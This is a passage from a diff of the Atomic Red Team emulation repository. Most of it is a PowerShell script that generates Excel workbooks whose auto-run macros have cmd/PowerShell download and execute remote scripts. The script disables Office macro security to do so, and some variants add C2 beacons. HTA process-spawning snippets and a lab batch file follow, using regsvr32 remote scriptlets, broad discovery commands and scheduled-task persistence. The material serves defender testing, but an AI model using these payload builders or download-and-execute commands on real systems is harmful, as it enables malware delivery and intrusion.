.DESCRIPTION
Upon execution, Excel will spawn cmd.exe to download and execute a chain reaction via powershell.
#>
#create macro
$Code = @"
Sub Auto_Open()
Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
End Sub
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-Wmiprvse-Benign-Trampoline {
<#
.SYNOPSIS
Uses COM to download and execute a chain reaction via wmiprvse. This version will not execute mimikatz.
.DESCRIPTION
Using COM, upon macro execution, wmiprvse will spawn cmd.exe to run powershell to download and execute a benign chain reaction.
#>
#create macro
$Code = @"
Sub Auto_Open()
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/dragonstail_benign.ps1')", Null, objConfig, intProcessID
End Sub
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-Wmiprvse-Trampoline {
<#
.SYNOPSIS
Uses COM to download and execute chain reaction via wmiprvse.
.DESCRIPTION
Using COM, upon macro execution, wmiprvse will spawn cmd.exe to run powershell to download and execute a benign chain reaction.
#>
#create macro
$Code = @"
Sub Auto_Open()
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", Null, objConfig, intProcessID
End Sub
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-Trampoline {
<#
.SYNOPSIS
Excel COM Trampoline.
.DESCRIPTION
Using COM, upon macro execution, wmiprvse will spawn cmd.exe to run powershell to download and execute a chain reaction.
#>
#create macro
$Code = @"
Sub Auto_Open()
Const ShellWindows = _
"{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
Set SW = GetObject("new:" & ShellWindows).Item()
SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe IWR -uri ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1"" -OutFile ""~\Documents\payload.bat"" ; ~\Documents\payload.bat", "C:\Windows\System32", Null, 0
End Sub
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-ShellBrowserWindow {
<#
.SYNOPSIS
Excel COM Trampoline.
.DESCRIPTION
Using COM, upon macro execution, svchost/explorer will spawn cmd.exe to run powershell to download and execute a chain reaction.
#>
#create macro
$Code = @"
Sub Auto_Open()
Const ShellBrowserWindow = _
"{C08AFD90-F2A1-11D1-8455-00A0C91F3880}"
Set SBW = GetObject("new:" & ShellBrowserWindow)
SBW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe IWR -uri ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1"" -OutFile ""~\Documents\payload.bat"" ; ~\Documents\payload.bat", "C:\Windows\System32", Null, 0
End Sub
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-wshshell {
<#
.SYNOPSIS
Excel COM WshShell.
.DESCRIPTION
Using COM, upon macro execution, svchost/explorer will spawn cmd.exe to run powershell to download and execute a chain reaction.
#>
#create macro
$Code = @"
Sub Auto_Open()
Set WshShell = CreateObject("WScript.Shell")
Set WshShellExec = WshShell.Exec("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')")
End Sub
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Shell-C2-GET {
<#
.SYNOPSIS
Standard macro execution.
.DESCRIPTION
Upon execution, Excel will spawn cmd.exe to download and execute a chain reaction via powershell.
#>
#create macro
$Code = @"
Sub Auto_Open()
Execute
C2
End Sub
Public Function Execute() As Variant
Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
End Function
Public Function C2() As Variant
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
URL = "http://www.example.com"
objHTTP.Open "GET", URL, False
objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
objHTTP.send ("ART=AtomicRedTeam")
End Function
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Shell-C2-POST {
<#
.SYNOPSIS
Standard macro execution.
.DESCRIPTION
Upon execution, Excel will spawn cmd.exe to download and execute a chain reaction via powershell.
#>
#create macro
$Code = @"
Sub Auto_Open()
Execute
C2
End Sub
Public Function Execute() As Variant
Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
End Function
Public Function C2() As Variant
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
URL = "http://www.example.com"
objHTTP.Open "POST", URL, False
objHTTP.setRequestHeader "User-Agent", "Mozilla (compatible; MSIE 6.0; Windows NT 5.0)"
objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
objHTTP.send ("ART=AtomicRedTeam")
End Function
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
#Determine Attack
Do {
Write-Host "
--------Select Attack---------
1. Chain Reaction Download and execute with Excel.
2. Chain Reaction Download and execute with Excel, wmiprvse
3. Chain Reaction Download and execute with Excel, wmiprvse benign
4. Chain Reaction Download and execute with Excel Shell
5. Chain Reaction Download and execute with Excel ShellBrowserWindow
6. Chain Reaction Download and execute with Excel WshShell
7. Chain Reaction Download and execute with Excel and POST C2.
8. Chain Reaction Download and execute with Excel and GET C2.
------------------------------"
$AttackNum = Read-Host -prompt "Select Attack Number & Press Enter"
} until ($AttackNum -eq "1" -or $AttackNum -eq "2" -or $AttackNum -eq "3" -or $AttackNum -eq "4" -or $AttackNum -eq "5" -or $AttackNum -eq "6" -or $AttackNum -eq "7" -or $AttackNum -eq "8")
#Initiate Attack Choice
if($AttackNum -eq "1"){
Excel-Com-Trampoline
}
elseif($AttackNum -eq "2"){
Excel-Com-Wmiprvse-Trampoline
}
elseif($AttackNum -eq "3"){
Excel-Com-Wmiprvse-Benign-Trampoline
}
elseif($AttackNum -eq "4"){
Excel-Shell
}
elseif($AttackNum -eq "5"){
Excel-Com-ShellBrowserWindow
}
elseif($AttackNum -eq "6"){
Excel-Com-wshshell
}
elseif($AttackNum -eq "7"){
Excel-Shell-C2-POST
}
elseif($AttackNum -eq "8"){
Excel-Shell-C2-GET
}
ARTifacts/Initial_Access/hta.md
+43
View File
@@ -0,0 +1,43 @@
# HTA
## AtomicHTA
Three ways to spawn calc using HTA. Each are customizable to download a chain reaction to perform additional behaviors.
## MSHTA - Explorer Spawning CMD
Using COM objects, mshta runs with no child processes. Explorer.exe spawns and executes cmd -> calc.
```
// Type One
// Child of Explorer, cmd.exe
var ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}";
var SW = GetObject("new:" + ShellWindows).Item();
SW.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", 'C:\\Windows\\System32', null, 0);
```
## MSHTA - Wmiprvse Spawning CMD
Using COM objects, mshta runs with no child processes. Wmiprvse spawns and executes cmd -> calc.
```
// Type Two
// Child of wmiprvse
var strComputer = ".";
var objWMIService = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2");
var objStartup = objWMIService.Get("Win32_ProcessStartup");
var objConfig = objStartup.SpawnInstance_();
objConfig.ShowWindow = 0;
var objProcess = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2:Win32_Process");
var intProcessID;
objProcess.Create("cmd.exe", null, objConfig, intProcessID);
```
## MSHTA spawning CMD
Mshta spawns child process of calc.exe.
```
// Type Three
// Child of mshta.exe
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
```
ARTifacts/Labs/Webinar11062017-Labs.bat
+36
View File
@@ -0,0 +1,36 @@
:: Basic Test Lab One
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct
::
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: Lab Two
:: Chain Reactions - Chaining Multiple ATOMIC Test
:: Lets have some fun shall we ;-)
:: Techniques rarely occur in isolation
:: In the Attack Lets combine 3 Techniques
:: You can customize tests
:: Step 1. A payload executes Regsvr32.exe as seen in Lab One T1117
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: Step 2. This payload will execute an discovery sequence T1087
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
:: Step 3. We will setup some persistence by creating a scheduled task. T1053
:: Alternate Ending : SCHTASKS /Create /SC ONCE /TN spawn /TR "regsvr32.exe /s /u /i:https://example.com/a.sct scrobj.dll" /ST 20:10
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
:: We will also just go ahead and clean up the task.
SCHTASKS /Delete /TN Spawn /F
atomics/T1547.001/src/Discovery.bat → ARTifacts/Misc/Discovery.bat
View File
ARTifacts/Misc/flag.txt
+1
View File
@@ -0,0 +1 @@
Downloaded Remote Content
CODE_OF_CONDUCT.md
+22 -38
View File
@@ -1,58 +1,42 @@
# Contributor Code of Conduct
# Contributor Covenant Code of Conduct
Welcome to the [Atomic Red Team online community](https://atomicredteam.io/). Our goal is to foster an open, safe, and welcoming environment. As a collective, we—as contributors, maintainers, and the Open Source Projects team of Red Canary—pledge to encourage our project and community to be a harassment-free space. We invite you to collaborate, exchange thoughts or information, and engage with one another. Atomic Red Team is meant for everyone, regardless of age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation.
## Our Pledge
## Our Guidelines
In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
### Acceptable Behavior
## Our Standards
* Using welcoming and inclusive language. Some people [use different pronouns](https://www.npr.org/2021/06/02/996319297/gender-identity-pronouns-expression-guide-lgbtq)— please respect all pronouns.
Examples of behavior that contributes to creating a positive environment include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community and what supports engagement
* Showing compassion and understanding towards other community members
* Focusing on what is best for the community
* Showing empathy towards other community members
### Unacceptable Behavior
Examples of unacceptable behavior by participants include:
* Unacceptable behaviors include: [intimidating, harassive, abusive, discriminatory, derogatory or demeaning conduct](https://www.doi.gov/employees/anti-harassment/definitions) by any one in the community
* Harassment includes: offensive verbal comments related to (but not limited to) age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation, or other protected category; inappropriate deliberate intimidation, stalking or following; inappropriate direct messages, and unwelcome sexual attention, imagery, or language
* Written, verbal or other abuse, [trolling](https://dictionary.cambridge.org/us/dictionary/english/trolling), intimidation, threats, annoyance, harassment, stalking, and/or spamming against any person, which in any way creates a disturbance that is disruptive or dangerous, or creates apprehension in a person
* Harassing individuals in a public or private form.
* Publishing others' private information, such as a physical or email address, without explicit permission
* Other conduct that could reasonably be considered inappropriate in a professional setting
* The use of sexualized language or imagery and unwelcome sexual attention or advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a professional setting
## Reporting
## Our Responsibilities
If you see anything that you believe breaks our community guidelines, no matter if its privately or publicly witnessed, please reach out to the **Red Canary Open Source Team** at [email](mailto:opensource@redcanary.com) with screenshots of the post/text and a link to the post or comments.
Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
## Enforcement & Consequences
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the Community Manager. Unacceptable behavior will not be tolerated by community members, maintainers, and Red Canary team members. The Atomic Red Team Community Manager and maintainers will review and investigate all complaints.
Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://slack.atomicredteam.io/)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.
Atomic Red Team maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Managers & Maintainers Responsibilities
Atomic Red Team Community Managers are responsible for upholding the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
Atomic Red Team Maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or that they otherwise deem inappropriate, threatening, offensive, or harmful.
Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
## Scope
This Code of Conduct applies to all of the Atomic Red Team, and “Atomic Family,” project spaces, including public spaces where an individual is representing the project or its community. Examples of representing the project or community include using an official project e-mail address, posting an official social media account, or acting as an appointed representative at an online or offline event.
This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
* [Atomic Red Team Website](https://atomicredteam.io/)
## Enforcement
* [Atomic Red Team Slack](https://slack.atomicredteam.io/)
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at research at redcanary.com. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
* [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team)
* **Atomic Family**
* [Invoke-AtomicRedTeam](https://github.com/redcanaryco/invoke-atomicredteam)
* [AtomicTestHarnesses](https://github.com/redcanaryco/atomictestharnesses)
* [Chain Reactor](https://github.com/redcanaryco/chain-reactor)
Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Attribution
Gemfile.lock
+254
View File
@@ -0,0 +1,254 @@
PATH
remote: .
specs:
